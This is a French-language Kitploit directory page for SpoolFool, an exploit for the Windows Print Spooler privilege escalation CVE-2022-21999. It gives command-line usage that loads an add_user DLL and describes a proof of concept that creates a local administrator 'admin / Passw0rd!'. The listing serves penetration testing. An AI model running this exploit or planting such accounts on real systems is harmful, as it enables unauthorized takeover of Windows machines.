Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SpoolFool — Exploit pour CVE-2022-21999 - Vulnérabilité d'élévation de privilèges du spouleur d'impression Windows (LPE) | Kitploit
Outils/GitHubGitHub/ly4k/spoolfool
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubly4k/spoolfool

SpoolFool

Exploit pour CVE-2022-21999 - Vulnérabilité d'élévation de privilèges du spouleur d'impression Windows (LPE)

Voir le dépôt
7961603il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

SpoolFool

Exploit pour CVE-2022-21999 - Vulnérabilité d'élévation de privilèges du service Print Spooler de Windows (LPE)

Détails

L'exploit fourni devrait fonctionner par défaut sur toutes les versions de bureau de Windows.

Veuillez consulter l'article de blog pour les détails techniques complets ici.

Utilisation

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Preuve de concept

La preuve de concept suivante utilise une DLL qui crée un nouvel administrateur local admin / Passw0rd!. La DLL (AddUser.dll) et le code source se trouvent dans ce dépôt.

Deuxième exécution

La preuve de concept suivante illustre une deuxième exécution de l'exploit fourni. Notez que la vulnérabilité n'est pas exploitée cette fois-ci afin de charger la DLL.

Artefacts

Après l'exécution de l'exploit, les artefacts suivants seront laissés pour un nettoyage ultérieur :

  • Le répertoire du pilote d'imprimante créé n'est pas supprimé
  • La DLL de payload est copiée dans le répertoire du pilote d'imprimante et n'est pas supprimée
  • Les imprimantes créées ne sont pas supprimées
  • La valeur SpoolDirectory de l'imprimante ciblée n'est pas restaurée

Auteurs

  • Oliver Lyak @ly4k_

Références

  • SpoolFool : Élévation de privilèges du service Print Spooler de Windows (CVE-2022-21999)
Télécharger l’outil